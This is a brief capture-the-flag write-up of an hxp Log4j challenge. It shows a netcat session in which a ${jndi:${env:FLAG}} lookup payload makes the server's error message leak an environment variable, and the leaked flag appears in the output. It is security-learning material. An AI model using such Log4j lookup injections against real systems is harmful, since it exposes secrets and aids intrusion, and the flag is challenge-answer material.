Tags: misc log4j
Rating: 3.5
TL;DR
- It's relevant to [Log4j – Log4j 2 Lookups](https://logging.apache.org/log4j/2.x/manual/lookups.html).
- JNDI can reach outer service. If the server is unreachable, it'll raise an error.
- We can use simply `Environment Lookup` to get the flag XD
```bash
$ nc 65.108.176.77 1337
What is your favourite CTF?
${jndi:${env:FLAG}}
:(
2021-12-20 03:18:44,730 main WARN Error looking up JNDI resource [hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.NoInitialContextException: Need to specify class name in environment or system property, or in an application resource file: java.naming.factory.initial
```
